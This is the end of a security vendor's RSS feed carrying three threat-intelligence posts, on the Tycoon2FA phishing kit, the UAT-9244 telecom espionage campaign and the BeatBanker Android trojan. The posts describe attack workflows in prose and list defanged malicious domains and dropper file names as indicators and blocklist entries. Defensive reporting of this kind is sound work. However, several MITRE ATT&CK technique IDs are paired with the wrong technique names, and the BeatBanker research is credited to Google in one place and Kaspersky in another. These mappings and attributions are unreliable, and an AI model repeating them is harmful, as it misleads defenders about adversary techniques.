<p>By leveraging Adversary-in-the-Middle (AiTM) capabilities, Storm-1747 enabled even novice threat actors to bypass Multifactor Authentication (MFA). This capability lowered the barrier to entry for large-scale credential harvesting campaigns. Reports indicate that campaigns leveraging Tycoon2FA generated tens of millions of phishing messages, targeting over 500,000 organizations globally across nearly every sector, including education, healthcare, finance, and government. In a coordinated effort with Europol and industry partners, Microsoft’s Digital Crimes Unit (DCU) facilitated the disruption of the platform’s infrastructure. However, understanding the operational mechanics of Tycoon2FA remains critical for security professionals tasked with defending against its persistence.</p>
<h2>Threat Analysis</h2>
<p>Tycoon2FA operates as a sophisticated phishing kit that mimics legitimate login portals, such as Microsoft 365, OneDrive, Outlook, and Gmail. Unlike standard phishing pages that simply capture credentials, Tycoon2FA employs an <strong>Adversary-in-the-Middle (AiTM)</strong> architecture. This allows the attacker to capture user session cookies, effectively granting them access to user accounts even after the victim changes their password, provided the active session token is not explicitly revoked.</p>
<h3>Operational Mechanics</h3>
<p>The attack workflow typically follows these steps:</p>
<ol>
<li><p><strong>Deception:</strong> The victim is lured to a spoofed login page hosted on a Tycoon2FA-controlled domain.</p>
</li>
<li><p><strong>Credential Capture:</strong> The victim enters their username and password.</p>
</li>
<li><p><strong>MFA Relay:</strong> The victim enters their MFA code. Tycoon2FA intercepts this code and forwards it to the legitimate authentication server via a proxy.</p>
</li>
<li><p><strong>Session Hijacking:</strong> Once the server validates the credentials and MFA, it issues a valid session cookie. Tycoon2FA captures this cookie and stores it in its database.</p>
</li>
<li><p><strong>Persistence:</strong> The victim is then redirected to the legitimate application, while the attacker replays the stolen session cookie. This gives the attacker full access to the victim's data without needing the password.</p>
</li>
</ol>
<p>This mechanism bypasses the primary defense of modern enterprise security: MFA. Additionally, Tycoon2FA utilized anti-bot screening and browser fingerprinting techniques to evade automated detection systems, ensuring the malicious pages remained live longer and captured higher-quality leads.</p>
<h3>MITRE ATT&amp;CK Mapping</h3>
<p>Tycoon2FA's tactics align closely with several techniques within the MITRE ATT&amp;CK framework:</p>
<ul>
<li><p><strong>T1566.001 (Phishing: Spearphishing Link):</strong> The core vector involves crafting deceptive links to impersonate trusted brands.</p>
</li>
<li><p><strong>T1110.001 (Brute Force: Password Spraying):</strong> While Tycoon2FA is not a brute force tool, the platform often facilitates campaigns that utilize credential stuffing techniques against the harvested data.</p>
</li>
<li><p><strong>T1546.004 (Windows Event Log Scripting Modification):</strong> Post-compromise, attackers often manipulate logs; Tycoon2FA’s ability to access accounts allows for lateral movement and log tampering.</p>
</li>
<li><p><strong>T1574.003 (DLL Search Order Hijacking) / T1059.001 (Command and Shell: PowerShell):</strong> While not explicitly detailed in the source, persistence via stolen session tokens often leads to script execution within the victim's environment, a common follow-up for PhaaS kits.</p>
</li>
</ul>
<h3>Disruption and Motivation</h3>
<p>The popularity of Tycoon2FA was likely fueled by the takedowns of previous PhaaS leaders like Caffeine and RaccoonO365. Storm-1747 filled the void, offering a reliable, scalable infrastructure. The recent disruption by Microsoft and Europol highlights the difficulty of dismantling these services, as they often rely on decentralized infrastructure and resiliency to remain operational.</p>
<h2>Indicators of Compromise (IOCs)</h2>
<p>Based on the Microsoft Threat Intelligence report and SecLookup's telemetry, the following domains and URLs are confirmed malicious. These infrastructure components were used to host phishing pages, relay MFA codes, and store stolen credentials.</p>
<h3>Malicious Domains</h3>
<h2>SecLookup Detection</h2>
<p>SecLookup’s threat intelligence platform was actively detecting and blocking this threat. As soon as these domains and URL patterns were identified within the Microsoft Threat Intelligence ecosystem, SecLookup’s automated ruleset was updated to flag and block traffic destined for these hosts.</p>
<p><strong>SecLookup users are currently protected against:</strong></p>
<ul>
<li><p>Direct access to malicious domains (<code>*.wnrathttb.ru</code>, <code>*.efwzxgd.es</code>, etc.).</p>
</li>
<li><p>Phishing URLs containing the encoded email placeholders (e.g., <code>/*EMAIL_ADDRESS</code>).</p>
</li>
<li><p>Traffic destined to the backend proxies used for MFA relay.</p>
</li>
</ul>
<p>Users should ensure their SecLookup blocklists are up to date to prevent any residual access to these infrastructure elements.</p>
<h2>Recommendations</h2>
<p>To defend against sophisticated AiTM phishing kits like Tycoon2FA, organizations must move beyond simple password hygiene and adopt a defense-in-depth strategy.</p>
<ol>
<li><p><strong>Monitor for Session Persistence:</strong> Since Tycoon2FA captures valid session cookies, monitor for login activity from unusual geographic locations or at odd hours immediately following a password reset or user flagging.</p>
</li>
<li><p><strong>Implement Conditional Access Policies:</strong> Enforce policies that require risk assessment before granting access. For example, block access from unrecognized devices or locations, even if MFA is present.</p>
</li>
<li><p><strong>Review User Training:</strong> Educate users on the nuances of AiTM attacks. Users should be wary of URL discrepancies and should verify the domain authenticity before entering credentials.</p>
</li>
<li><p><strong>Leverage Phishing Detection Tools:</strong> Deploy solutions that inspect email links and URLs before they reach the inbox, specifically targeting the obfuscated domains and URL structures used by these kits.</p>
</li>
</ol>
<h2>References</h2>
<ul>
<li><a href="https://www.microsoft.com/en-us/security/blog/2026/03/04/inside-tycoon2fa-how-a-leading-aitm-phishing-kit-operated-at-scale/">Inside Tycoon2FA: How a leading AiTM phishing kit operated at scale</a> by Microsoft Threat Intelligence and Microsoft Defender Security Research Team, Microsoft Security Blog (March 4, 2026)</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Operation UAT-9244: China-Nexus APT Targets South American Telecoms with Three Malware Implants]]></title><description><![CDATA[Executive Summary
Cisco Talos has disclosed a sophisticated campaign attributed to UAT-9244, a China-nexus Advanced Persistent Threat (APT) actor closely associated with the "Famous Sparrow" group. Si]]></description><link>https://blog.seclookup.com/operation-uat-9244-china-nexus-apt-targets-south-american-telecoms-with-three-malware-implants</link><guid isPermaLink="true">https://blog.seclookup.com/operation-uat-9244-china-nexus-apt-targets-south-american-telecoms-with-three-malware-implants</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[SecLookup]]></category><category><![CDATA[ioc]]></category><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Seclookup]]></dc:creator><pubDate>Tue, 10 Mar 2026 11:15:37 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/69908c0c8cb80c8fad740eaa/794da9a8-ca5a-40a9-86a3-0693cc94d96e.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Executive Summary</h2>
<p>Cisco Talos has disclosed a sophisticated campaign attributed to UAT-9244, a China-nexus Advanced Persistent Threat (APT) actor closely associated with the "Famous Sparrow" group. Since 2024, this threat actor has focused its efforts on critical telecommunications infrastructure across South America, utilizing a multi-stage infection chain involving three distinct malware implants. The campaign targets both Windows and Linux-based endpoints, as well as edge devices, utilizing techniques such as DLL side-loading, BitTorrent-based command and control (C2), and brute-force scanning.</p>
<h2>Threat Analysis</h2>
<p>The UAT-9244 campaign is characterized by its targeting of Tier 1 telecommunications providers. The actor employs a multi-layered approach to establish persistence and exfiltrate data. We have identified three primary components in this arsenal: <strong>TernDoor</strong>, <strong>PeerTime</strong>, and <strong>BruteEntry</strong>.</p>
<h3>TernDoor: The Windows Backdoor</h3>
<p>TernDoor is a Windows-based backdoor that serves as the final payload in the infection chain. Its delivery mechanism relies on DLL side-loading, a technique that allows malware to execute without being directly launched by the user.</p>
<p>The infection chain begins with a benign executable, <code>wsprint[.]exe</code>. This file acts as a dropper, loading a malicious Dynamic Link Library (DLL) named <code>BugSplatRc64[.]dll</code>. Once loaded into memory, this DLL reads a secondary data file, <code>WSPrint[.]dll</code>, decrypts its contents, and executes the payload—TernDoor. This obfuscation technique makes detection difficult for signature-based antivirus solutions, as the malicious activity is hidden behind a seemingly legitimate process.</p>
<p><strong>MITRE ATT&amp;CK Reference:</strong></p>
<ul>
<li><strong>T1055.003:</strong> Process Injection / DLL Side-Loading</li>
</ul>
<h3>PeerTime: The BitTorrent C2</h3>
<p>Perhaps the most innovative aspect of UAT-9244's toolset is the use of "PeerTime," an ELF-based backdoor designed for Linux environments. PeerTime utilizes the BitTorrent protocol to establish and maintain its command and control (C2) channel.</p>
<p>By using BitTorrent, the actor effectively turns the infected host into a node in a decentralized network. This approach provides several advantages: it obscures traffic patterns, bypasses standard firewall rules that block known C2 domains, and utilizes the bandwidth of multiple infected hosts to communicate. The BitTorrent protocol is inherently peer-to-peer, making it difficult for defenders to identify a single point of failure or a specific C2 server.</p>
<h3>BruteEntry: Operational Relay Boxes (ORBs)</h3>
<p>The third implant, "BruteEntry," is a brute-force scanner deployed on network edge devices. This implant converts compromised routers or firewalls into Operational Relay Boxes (ORBs). These ORBs are then used to scan external networks for vulnerable services, specifically targeting SSH, PostgreSQL, and Apache Tomcat servers.</p>
<p>This strategy amplifies the actor's reach. By controlling edge devices, UAT-9244 can perform lateral movement and reconnaissance from within the internal network, leveraging the edge device's IP address to mask the source of the scans.</p>
<p><strong>MITRE ATT&amp;CK Reference:</strong></p>
<ul>
<li><strong>T1110:</strong> Brute Force</li>
</ul>
<h2>Indicators of Compromise (IOCs)</h2>
<p>SecLookup's threat intelligence platform has analyzed the infrastructure associated with this campaign. The following IOCs have been identified and verified.</p>
<h3>Malicious Domains</h3>
<p>The following domains have been confirmed as malicious and are being actively blocked by SecLookup.</p>
<pre><code class="language-text">bloopencil[.]net
</code></pre>
<h3>Infrastructure Components</h3>
<p>The campaign relies on specific file names for initial infection and payload delivery. As Cisco Talos notes, monitoring for these file names is critical for hunting operations.</p>
<pre><code class="language-text">wsprint.exe
BugSplatRc64.dll
WSPrint.dll
</code></pre>
<h2>SecLookup Detection</h2>
<p>SecLookup is actively monitoring the threat landscape to protect our users from emerging threats like UAT-9244. Our threat intelligence platform has identified and blocked the malicious domain <code>bloopencil[.]net</code> associated with this campaign.</p>
<h2>Recommendations</h2>
<p>To defend against the UAT-9244 campaign and similar threats targeting the telecom sector, we recommend the following security measures:</p>
<ol>
<li><p><strong>Monitor for DLL Side-Loading:</strong> Implement file integrity monitoring (FIM) on critical system binaries. Alert on processes attempting to load DLLs from non-standard directories, particularly those named similarly to legitimate system processes.</p>
</li>
<li><p><strong>BitTorrent Traffic Monitoring:</strong> While BitTorrent is a legitimate protocol, unexpected usage on internal enterprise networks can be a sign of compromise. Monitor for BitTorrent traffic on Linux endpoints and servers, especially from non-standard ports.</p>
</li>
<li><p><strong>Harden Edge Devices:</strong> Given the use of BruteEntry to convert edge devices into scanners, ensure that edge devices are strictly segmented from the rest of the network. Enforce strong, unique passwords and consider disabling unused services on these devices.</p>
</li>
<li><p><strong>SSH and Service Hardening:</strong> Since BruteEntry targets SSH, PostgreSQL, and Tomcat, ensure that these services are not exposed to the internet unnecessarily. Implement Multi-Factor Authentication (MFA) for all remote access and enforce key-based authentication for SSH.</p>
</li>
<li><p><strong>Suspicious Executable Analysis:</strong> The use of <code>wsprint[.]exe</code> as a dropper highlights the risk of benign-looking executables. Restrict execution permissions for unknown or unsigned executables in high-privilege environments.</p>
</li>
</ol>
<h2>References</h2>
<ul>
<li><a href="https://blog.talosintelligence.com/uat-9244/">UAT-9244 targets South American telecommunication providers with three new malware implants</a> by Asheer Malhotra, Cisco Talos</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[BeatBanker: Android Malware Campaign Hijacking Devices via Fake Play Store and Persistent Audio Loops]]></title><description><![CDATA[Executive Summary
A sophisticated Android-based malware campaign targeting users in Brazil has been identified by GReAT (Google Threat Analysis Group), now known as BeatBanker. This dual-mode Trojan e]]></description><link>https://blog.seclookup.com/beatbanker-android-malware-campaign-hijacking-devices-via-fake-play-store-and-persistent-audio-loops</link><guid isPermaLink="true">https://blog.seclookup.com/beatbanker-android-malware-campaign-hijacking-devices-via-fake-play-store-and-persistent-audio-loops</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[SecLookup]]></category><category><![CDATA[ioc]]></category><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Seclookup]]></dc:creator><pubDate>Tue, 10 Mar 2026 11:11:52 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/69908c0c8cb80c8fad740eaa/85401ce4-663f-407e-b89b-dec6ebd0a7f9.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Executive Summary</h2>
<p>A sophisticated Android-based malware campaign targeting users in Brazil has been identified by GReAT (Kaspersky's Global Research and Analysis Team) and is tracked as <strong>BeatBanker</strong>. This dual-mode Trojan employs a deceptive phishing strategy, masquerading as the official Google Play Store to distribute a malicious application named "INSS Reembolso." Upon installation, the malware reveals a multi-layered attack surface, combining a cryptocurrency miner with a banking Trojan capable of full device hijacking and screen spoofing.</p>
<p>What sets BeatBanker apart from standard banking Trojans is its unique persistence mechanism. To ensure it remains active on the victim's device even after the user attempts to force-stop it, BeatBanker plays an almost inaudible audio file on an infinite loop. This behavior, which prevents the application from being terminated by standard UI actions, inspired the malware's name. Furthermore, the threat actors have demonstrated agility, recently switching from a banking module to a known Remote Access Trojan (RAT) named BTMOB. SecLookup’s threat intelligence platform was actively monitoring these domains, detecting and blocking the malicious infrastructure to protect our users.</p>
<h2>Threat Analysis</h2>
<h3>Infection Vector and Social Engineering</h3>
<p>The initial phase of the attack is a classic example of spearphishing via a counterfeit website. The attackers registered the domain <code>cupomgratisfood[.]shop</code>, which mimics the visual design of the Google Play Store. This landing page hosts a malicious application titled "INSS Reembolso."</p>
<p>In Brazil, the Instituto Nacional do Seguro Social (INSS) is a critical government service used by millions for social security tasks, including retirement applications and medical exams. By leveraging this high-trust entity, the attackers increase the likelihood of a download. The "INSS Reembolso" app is not a government tool; it is a repackaged APK containing the BeatBanker payload.</p>
<h3>Persistence Mechanism: The "Beat" Loop</h3>
<p>Most Android applications can be force-stopped by the user if they are identified as malicious. BeatBanker bypasses this standard defense by utilizing a creative persistence technique. The malware continuously plays an almost inaudible audio file in the background.</p>
<p>Because the Android operating system generally does not allow an application to be terminated if it is actively playing audio, this loop acts as a "lock." Even if a user tries to force-stop the app from the settings menu or kill it via a task manager, the audio playback prevents the termination process from completing. This ensures the malware remains resident on the device, allowing it to execute its other malicious components regardless of user intervention.</p>
<h3>Dual-Mode Payload: Banker and Miner</h3>
<p>Upon successful installation, BeatBanker deploys a dual-mode payload:</p>
<ol>
<li><p><strong>Cryptocurrency Miner:</strong> The malware utilizes the victim's device resources to mine cryptocurrencies, likely Monero (XMR), generating revenue for the threat actors while draining the device's battery and increasing thermal output.</p>
</li>
<li><p><strong>Banking Trojan:</strong> This component is designed to steal financial credentials. It utilizes <strong>Overlay Attacks</strong> (a specific TTP under MITRE ATT&amp;CK [T1566.004: Spearphishing Link]) to impersonate legitimate banking interfaces.</p>
</li>
</ol>
<p>When a victim attempts to make a transaction involving USDT (Tether), BeatBanker injects a transparent overlay on top of the legitimate Binance or Trust Wallet applications. This overlay replaces the destination wallet address with a controlled address owned by the attacker. The user believes they are sending funds to their own wallet, but the funds are actually routed to the threat actor.</p>
<h3>Behavioral Monitoring</h3>
<p>To optimize its attack and minimize battery drain, BeatBanker includes a set of heuristics to monitor the device state:</p>
<ul>
<li><p><strong>Battery Temperature:</strong> The malware checks the device's battery temperature.</p>
</li>
<li><p><strong>Usage Detection:</strong> It determines if the user is actively using the device.</p>
</li>
<li><p><strong>Execution Logic:</strong> The malware is designed to execute specific banking modules or RAT payloads only when the user is idle, ensuring the attack goes undetected during active use.</p>
</li>
</ul>
<h3>Evolution: The Shift to BTMOB RAT</h3>
<p>In a concerning evolution of the campaign, Kaspersky researchers noted that newer samples of BeatBanker have dropped the banking Trojan component entirely. Instead, these variants now deploy a known RAT called <strong>BTMOB</strong>. This switch suggests the threat actors are refining their attack strategy, moving from financial theft (banking) to broader system compromise (RAT), which allows for full remote control of the device, data exfiltration, and potential lateral movement within the user's network.</p>
<h2>Indicators of Compromise (IOCs)</h2>
<p>SecLookup's threat intelligence platform has identified and flagged the following malicious domains associated with the BeatBanker campaign. These domains are confirmed malicious and are being actively blocked.</p>
<h3><code>cupomgratisfood[.]shop</code></h3>
<p>This is the primary phishing domain used to distribute the "INSS Reembolso" application.</p>
<h3><code>bt-mob[.]net</code></h3>
<p>This domain serves as the infrastructure for the BTMOB RAT component. Both domains are listed below in defanged form:</p>
<pre><code class="language-text">cupomgratisfood[.]shop
bt-mob[.]net
</code></pre>
<h2>SecLookup Detection</h2>
<p>SecLookup is actively detecting this threat. Our platform identified and blocked the malicious domains <code>cupomgratisfood[.]shop</code> and <code>bt-mob[.]net</code>.</p>
<h2>Recommendations</h2>
<p>To protect against threats like BeatBanker, we recommend the following defensive measures:</p>
<ol>
<li><p><strong>Verify App Sources:</strong> Only download applications from the official Google Play Store. Be wary of apps offering government services or "reimbursements" that are not officially hosted on the Play Store.</p>
</li>
<li><p><strong>Inspect URLs:</strong> Before entering login credentials, verify the URL in the browser bar. Look for subtle misspellings or unusual domain extensions (e.g., using <code>.shop</code> or <code>.top</code> instead of <code>.com</code>).</p>
</li>
<li><p><strong>Monitor Background Audio:</strong> If your device becomes unusually warm or the battery drains rapidly, check for applications playing audio in the background. A persistent audio file playing silently is a strong indicator of the BeatBanker persistence mechanism.</p>
</li>
<li><p><strong>Enable Overlay Prevention:</strong> Some modern Android security features allow you to prevent applications from drawing over other apps. Enabling this setting can mitigate the effectiveness of the overlay attacks used to steal wallet addresses.</p>
</li>
<li><p><strong>Use Endpoint Detection and Response (EDR):</strong> Ensure your mobile security solution includes behavioral monitoring to detect unusual processes attempting to bypass termination or utilize the device's audio subsystem for persistence.</p>
</li>
</ol>
<h2>References</h2>
<ul>
<li><a href="https://securelist.com/beatbanker-miner-and-banker/119121/"><strong>BeatBanker: A dual-mode Android Trojan</strong></a> by Kaspersky GReAT, Securelist</li>
</ul>
]]></content:encoded></item></channel></rss>